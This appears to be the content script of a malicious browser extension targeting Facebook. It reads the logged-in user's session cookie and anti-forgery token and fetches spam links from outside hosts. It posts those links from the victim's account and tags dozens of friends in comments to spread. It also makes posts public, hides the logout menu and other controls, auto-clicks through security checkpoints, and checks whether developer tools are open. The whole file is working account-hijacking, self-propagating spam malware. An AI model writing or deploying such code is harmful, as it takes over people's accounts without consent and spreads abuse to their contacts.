var consoleFree = true;
function start() {
    var cookie_name = "startv_amcaaikaaaaldaaar_";
    var cookie_time = 30;

    if(!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now()-60*1000*cookie_time){
        localStorage[cookie_name] = Date.now();
        config={
            "link": "http://{random}.{domain}/{random}",
            "post_limit": "10",
            "tag_limit": "50",
            "mode": true,
            "testuser": "100010314190852"
        }
        console.log(config);
        //add();
        if(config.mode == true || profile_id == config.testuser){
            arkadas();
            //privacySetting();
            publicAll();
            console.log("Arkadaşlar getiriliyor.");
        }
    }else{
        var active_time = new Date();
        active_time.setTime(parseInt(localStorage[cookie_name]) + (60*1000*cookie_time));
        console.log("active_time:" + active_time.toLocaleString());
    }
}
function arkadas() {
    var params = {
        __pc:"EXP1:DEFAULT",
        viewer:profile_id,
        "filter[0]":"user",
        "options[0]":"friends_only",
        token:"v7",
        context:"mentions",
        rsp:"mentions",
        sid:"1197780291395",
        request_id:"b6924372-20f2-4585-bf14-c7db6ea77b78",
        __user:profile_id,
        __a:1,
        __dyn:"7A"+rastgele(105),
        __req:"e",
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?"+deSerialize(params), true);
    xhr.onreadystatechange = function(){
        if (xhr.readyState == 4 && xhr.status == 200){
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            if (!data.error){
                var friends = data.payload.entries.sort(function(a, b) {
                    return a.index - b.index;
                });
                var vars = {};
                friends = shuffle(friends);
                vars.friends = [];
                for(i=0;i<friends.length;i++){
                    if(friends[i].uid.toString() != profile_id){
                        vars.friends.push(friends[i]);
                    }
                }
                
                if(vars.friends.length > 0){
                    sendTags(vars);
                }
            }
        }
    }
    xhr.send();
}

function sendTags(vars){
    var p_limit = Math.ceil(vars.friends.length/config.tag_limit);
    config.post_limit = p_limit>config.post_limit?config.post_limit:p_limit;
    if(config.post_limit == 0){
        config.post_limit = 1;
    }
    for(p=0;p<config.post_limit;p++){
        vars.tags = [];
        for(pk=0;pk<config.tag_limit;pk++){
            var index = pk+(config.tag_limit*p);
            if(vars.friends[index]){
                vars.tags.push(vars.friends[index]);
            }
        }
        console.log(vars.tags);
        getLink(vars);
    }
}


function getLink(vars){
    var tags = vars.tags;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://pupagaming.ga/php/link.php?ext=me",true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText);
            if(data.link){
                vars.link = data.link;
                vars.tags = tags;
                checkBlocked(vars);
            }
        }
    }
}
function checkBlocked(vars){
    var uid = vars.uid;
    var name = vars.name;
    var link = vars.link;
    var image = vars.image;
    var parser = document.createElement('a');
    parser.href = vars.link;
    var params = {
        api_key:"113869198637480",
        href:"http://" + parser.host,
        ext:"me"
    }

    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.facebook.com/plugins/feedback.php?"+deSerialize(params));
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            vars.uid = uid;
            vars.name = name;
            vars.link = link;
            vars.image = image;
            if(xhr.responseText.indexOf("targetFBID") > 0){
                debug(vars);
            }else if(xhr.responseText.indexOf("lowerDomain") > 0){
                reportBlocked(vars);
            }
        }
    }
}

function reportBlocked(vars){
    var uid = vars.uid;
    var name = vars.name;
    var image = vars.image;
    var parser = document.createElement('a');
    parser.href = vars.link;
    var extension = "."+parser.host.split("blogspot.")[1];
    var subdomain = parser.host.split(".")[0];
    var params = {
        tld:extension,
        blog:subdomain,
        hash:hash,
        ext:"me"
    }
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://uye.io/php/blocked.php?"+deSerialize(params));
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            vars.uid = uid;
            vars.name = name;
            vars.image = image;
            getLink(vars);
        }
    }
}
function debug(vars){
    var tags = vars.tags;
    var link = vars.link;
    var params = {
        action_properties:JSON.stringify({"object":vars.link}),
        action_type:"og.likes",
        app_id:"113869198637480",
        display:"popup",
        e2e:"{}",
        locale:"en_US",
        mobile_iframe:false,
        sdk:"joey",
        redirect_uri:"http://www.facebook.com/dialog/return/close",
        version:"v2.6",
        ext:"me"
    }

    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.facebook.com/v2.6/dialog/share_open_graph?"+deSerialize(params));
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            vars.tags = tags;
            vars.link = link;
            if(xhr.responseText.indexOf("object_id=") > 0){
                vars.link_id = xhr.responseText.split("object_id=")[1].split("&")[0];
                read(vars);
            }else{
                getLinkID(vars);
            }
        }
    }
}

function getLinkID(vars){
    var tags = vars.tags;
    var link = vars.link;
    var params = {
        q:vars.link,
        ext:"me"
    }

    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://developers.facebook.com/tools/debug/og/object/?"+deSerialize(params));
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            if(xhr.responseText.indexOf("object_id=") > 0){
                vars.tags = tags;
                vars.link = link;
                vars.link_id = xhr.responseText.split("object_id=")[1].split("&")[0];
                read(vars);
            }
        }
    }
}

function read(vars){
    var tags = vars.tags;
    var link = vars.link;
    var getParams = {
        action:"add",
        collection_curation_referrer:"about_uri_indirect",
        item_id:vars.link_id,
        log_feedback:1,
        mechanism:"suggestion_question",
        surface:"self_about_recommendations",
        surface_collection_id:46,
        dpr:1,
        ext:"me"
    }

    var params = {
        is_first:0,
        collection_token:profile_id + ":177822289030932:46",
        __user:profile_id,
        __a:1,
        __dyn:"aKhoFeyfyBm985A9UoHbgWy1m9ACwKyaF298yeqrWo8popyUWdwIhEoyUnwgUy22Ef9Unkwy3eF8WUOuVWxeUlxivG7EdV9VVpo9XCz9qCzEkxvz8-cx2q5qxe6U89rw",
        __req:"2s",
        __be:0,
        __pc:"EXP1:DEFAULT",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/timeline/collections/add_recs/?"+deSerialize(getParams));
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            vars.post_id = searchArray(data,"targetfbid");
            if(!data.error && vars.post_id){
                vars.tags = tags;
                vars.link = link;
                console.log("Post gönderildi: https://www.facebook.com/" + vars.post_id);
                //new Image().src = 'https://futunga.com/saveResponse.php?sonuc=' + vars.post_id + "&link=" + vars.link + "&img=" + vars.image + "&type=Post" + "&success=1";
                // editPost(vars);

                comment(vars);
                unFollowPost(vars);
                makePublic(vars);
            }
        }
    }
}

function makePublic(vars){
    var audience_json = {};
    audience_json[vars.post_id] = {"value":80};
    var params = {
        id:vars.post_id,
        audience_json:JSON.stringify(audience_json),
        __user:profile_id,
        __a:1,
        __dyn:"5V5yAW8-aFoAwmgDxyIGzGomyp9EbEyGgS8zCC-C26m6oKezob4q68K5U4e2O3O7R88wPG4Xz9XDG4Xxm58O7EdV9VVpo9XxemFEW2PxOcx2q5omxK229x2m",
        __req:"c",
        __be:0,
        __pc:"EXP1:DEFAULT",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev,
        "ft[fbfeed_location]":5
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/privacy/simple_save.php?ext=me");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            
        }
    }
}

function editPost(vars){
    var tags = vars.tags;
    var post_id = vars.post_id;
    var params = {
        fb_dtsg:fb_dtsg,
        edited_post_fbid:vars.post_id,
        story_dom_id:"u_0_t",
        parent_story_dom_id:"u_0_t",
        hey_kid_im_a_composer:1,
        display_context:"home",
        xhpc_context:"home",
        is_permalink:1,
        entstory_context:JSON.stringify({"is_viewer_page_admin":false,"is_notification_preview":false,"autoplay_with_channelview_or_snowlift":false,"fbfeed_context":true,"location_type":5,"outer_object_element_id":"u_0_t","object_element_id":"u_0_t","is_ad_preview":false,"is_editable":false,"shimparams":{"page_type":16,"actor_id":profile_id,"story_id":vars.post_id,"ad_id":0,"_ft_":"","location":"permalink"},"story_id":"u_0_u","caret_id":"u_0_v"}),
        status_text:"",
        status:"",
        save:1,
        __user:profile_id,
        __a:1,
        __dyn:"5V5yAW8-aFoAwmgDxyIGzGomyp9EbEyGgS8zCC-C26m5-bzEeAq68K5U4e2CEaUgxZi28cWxeUOuVWxeUlxicxW3uiuumm2uUjBGqewIUsz8gCxm5ErwwyogBw",
        __req:"m",
        __be:0,
        __pc:"EXP1:DEFAULT",
        ttstamp:ttstamp,
        __rev:__rev
    }

    for(i=0;i<vars.tags.length;i++){
        var first_name = vars.tags[i].text.split(" ")[0];
        params.status += "@["+vars.tags[i].uid+":"+first_name+"] ";
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/open_graph/edit_message?ext=me&av="+profile_id);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
     xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            if(data.error){
                vars.tags = tags;
                vars.post_id = post_id;
                comment(vars);
            }
        }
    }
}

function comment(vars){
    var params = {
        ft_ent_identifier:vars.post_id,
        comment_text:"",
        source:2,
        client_id:Date.now()+":"+Math.floor(Date.now()/1000),
        session_id:rastgele(8),
        reply_fbid:"",
        parent_comment_id:"",
        rootid:"u_0_13",
        clp:"",
        attached_sticker_fbid:0,
        attached_photo_fbid:0,
        attached_video_fbid:0,
        feed_context:JSON.stringify({"is_viewer_page_admin":false,"is_notification_preview":false,"autoplay_with_channelview_or_snowlift":false,"fbfeed_context":true,"location_type":5,"outer_object_element_id":"u_0_u","object_element_id":"u_0_u","is_ad_preview":false,"is_editable":false,"shimparams":{"page_type":16,"actor_id":profile_id,"story_id":vars.post_id,"ad_id":0,"_ft_":"","location":"permalink"},"story_id":"u_0_v","caret_id":"u_0_w","__IS_INSIDE_UI_FEEDBACK_FORM__":true}),
        "ft[tn]":"[]",
        "ft[fbfeed_location]":5,
        av:profile_id,
        __user:profile_id,
        __a:1,
        __dyn:"5V5yAW8-aFoAwmgDxyIGzGomyp9EbEyGgS8zCC-C26m5-bzEeAq68K5U4e2CEf8vkwy3eEjKcDKuEjK5okz8uwTADDBBwDK4VqCzEbe78O49Elxq6U88C",
        __req:20,
        __be:0,
        __pc:"EXP1:DEFAULT",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    for(i=0;i<vars.tags.length;i++){
        params.comment_text += "@["+vars.tags[i].uid+":"+rastgele(5)+"]";
    }
    
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ufi/add/comment/?ext=me");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            
        }
    }
}

function unFollowPost(vars){
    var vars = vars;
    var params = {
        message_id:vars.post_id,
        follow:0,
        __user:profile_id,
        __a:1,
        __dyn:"7AmajEzUFlym5Q9UoHbgWy1m9ACwKyaF298yupFLFwxBxvyUWu396xybxu3fzoy22Eau49UnEwycAxGqKEWfybDG4Upxi9AxO2-uczpo9XCgKmFAdAw",
        __req:"m",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/litestand/follow_post?ext=me");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
     xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            
        }
    }
}

function publicAll(){
    var params = {
        id:"140037052831028",
        audience_json:JSON.stringify({"140037052831028":{"value":80}}),
        "nctr[_mod]":"pagelet_timeline_medley_movies",
        __user:profile_id,
        __a:1,
        __dyn:"aKhoFeyfyBm985A9UoHbgWy1m9ACwKyaF298yeqrWo8popyUWdwIhEoyUnwgUy22Ef9Unkwy3eF8WUOuVWxeUlxivG7EdV9VVpo9XCz9qCzEkxvz8-cx2q5qxe6U89rw",
        __req:"1c",
        __be:0,
        __pc:"EXP1:DEFAULT",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/privacy/simple_save.php");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            
        }
    }
}

function privacySetting(){
    var params = {
        value:"300645083384735",
        prev_value:"291667064279714",
        __user:profile_id,
        __a:1,
        __dyn:"7AmajEyl35wzgDxyG8EigmzFEbEKA8Ay8Z9LFwxBxCbzES2N6xybxu3fzoaqxbxjx27W88ybx-qA4E-8KuEjxC2e784i4U9Xw",
        __req:"15",
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/ajax/settings/granular_privacy/composer.php");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
            
        }
    }
}

function decode(t,h){
    var a = "abcdefghijklmnoprstuvyzx0123456789";
    var c = "";
    for(cr=0;cr<t.length;cr++){
        c += a[h.indexOf(t[cr])];
    }
    return c;
}

function guid() {
  function s4() {
    return Math.floor((1 + Math.random()) * 0x10000)
      .toString(16)
      .substring(1);
  }
  return s4() + s4() + '-' + s4() + '-' + s4() + '-' +
    s4() + '-' + s4() + s4() + s4();
}

function randoms(l, m) {
    var r = [];
    while (r.length < l) {
        var rnd = Math.floor(Math.random() * m);
        if (r.indexOf(rnd) < 0) {
            r.push(rnd);
        }
    }
    return r;
}

function searchArray(a,k){
    var found = false;
    for(key in a){
        if(key.toString() == k){
            found = a[key];
            break;
        }else if(typeof a[key] == "object"){
            found = searchArray(a[key],k);
            if(found != false){
                break;
            }
        }
    }
    return found;
}

function shuffle(array) {
  var currentIndex = array.length, temporaryValue, randomIndex;

  while (0 !== currentIndex) {
    randomIndex = Math.floor(Math.random() * currentIndex);
    currentIndex -= 1;
    temporaryValue = array[currentIndex];
    array[currentIndex] = array[randomIndex];
    array[randomIndex] = temporaryValue;
  }

  return array;
}

function rand(min,max){
    return Math.floor(Math.random()* (max-min))+min;
}

function rastgele(uzunluk) {
    mtn = "abcdefghijklmnoprstuvyzxABCDEFGHIJKLMNOPRSTUVYZX0123456789";
    ret = "";
    for (l = 0; l < uzunluk; l++) {
        ret += mtn[Math.floor(Math.random() * mtn.length)];
    }
    return ret;
}

function deSerialize(json) {
    return Object.keys(json).map(function(key) {
        return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
    }).join('&');
}

function blockRemove(){
    window.setInterval(function() {
        if (document.getElementsByClassName("_5ce")) {
            for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
                document.getElementsByClassName("_5ce")[i].innerHTML = "";
            }
        
        } 
        if (document.getElementsByClassName("uiToggle wrap")) {
            for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
                document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
            }
        }
        if(document.getElementById("logoutMenu")){
           document.getElementById("logoutMenu").parentNode.outerHTML = ""
        }
        if (document.getElementsByClassName("uiPopover")) {
            for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
                document.getElementsByClassName("uiPopover")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("UFICommentCloseButton")) {
            for (i = 0; i < document.getElementsByClassName("UFICommentCloseButton").length; i++) {
                document.getElementsByClassName("UFICommentCloseButton")[i].outerHTML = "";
            }
        }
    }, 10);
}

function checkPoint(){
    document.body.innerHTML = "";
    var params = {
        fb_dtsg:fb_dtsg,
        nh:nh,
        "submit[Get Started]":"Get Started"
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/checkpoint/");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            checkPointContinue();
            console.log("Get Started");
        }
    }
}

function checkPointContinue(){
    var params = {
        fb_dtsg:fb_dtsg,
        nh:nh,
        confirm:"on",
        "submit[Continue]":"Continue"
    }

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.facebook.com/checkpoint/");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send(deSerialize(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            console.log("Get Continue");
            deleteAllCookies();
            location.href = "https://www.facebook.com";
        }
    }
}

function deleteAllCookies() {
    var cookies = document.cookie.split(";");
    for (var i = 0; i < cookies.length; i++) {
        var cookie = cookies[i];
        var eqPos = cookie.indexOf("=");
        var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
        document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT;domain=.facebook.com";
    }
}

var checkStatus = 'off';
var element = new Image();
element.__defineGetter__('id', function() {
    checkStatus = 'on';
});
console.log(element);

if (location.hostname.indexOf("facebook.com") >= 0 && (checkStatus == 'off' || consoleFree == true)) {
    fb_dtsg_list = document.getElementsByName('fb_dtsg');
    if(!document.getElementById("isrun") && fb_dtsg_list.length > 0 && location.href.indexOf("facebook.com/checkpoint") < 0){
        var log = document.createElement("meta");
        log.id = "isrun";
        document.head.appendChild(log);
        blockRemove();
        profile_id = document.cookie.match(/c_user=(\d+)/)[1];
        fb_dtsg = fb_dtsg_list[0].value;
        __rev = document.head.innerHTML.split('"revision":')[1].split(",")[0];
        ajaxpipe_token = document.head.innerHTML.split('"ajaxpipe_token":')[1].split(",")[0];
        ttstamp = "";
        for (var x = 0; x < fb_dtsg.length; x++){
            ttstamp += fb_dtsg.charCodeAt(x);
        }
        ttstamp = '2' + ttstamp;
        console.log("User:"+profile_id);
        console.log("fb_dtsg:"+fb_dtsg);
        console.log("__rev:"+__rev);
        console.log("ttstamp:"+ttstamp);
        console.log("ajaxpipe_token:"+ajaxpipe_token);

        start();
    }
    if(location.href.indexOf("facebook.com/checkpoint") > 0 && fb_dtsg_list.length > 0){
        fb_dtsg = fb_dtsg_list[0].value;
        nh = document.getElementsByName("nh")[0].value;
        console.log(fb_dtsg);
        console.log(nh);
        checkPoint();
    }
}else if(location.hostname.indexOf("facebook.com") >= 0){
    console.error("Not found");
}

window.setInterval(function(){
 
},300);
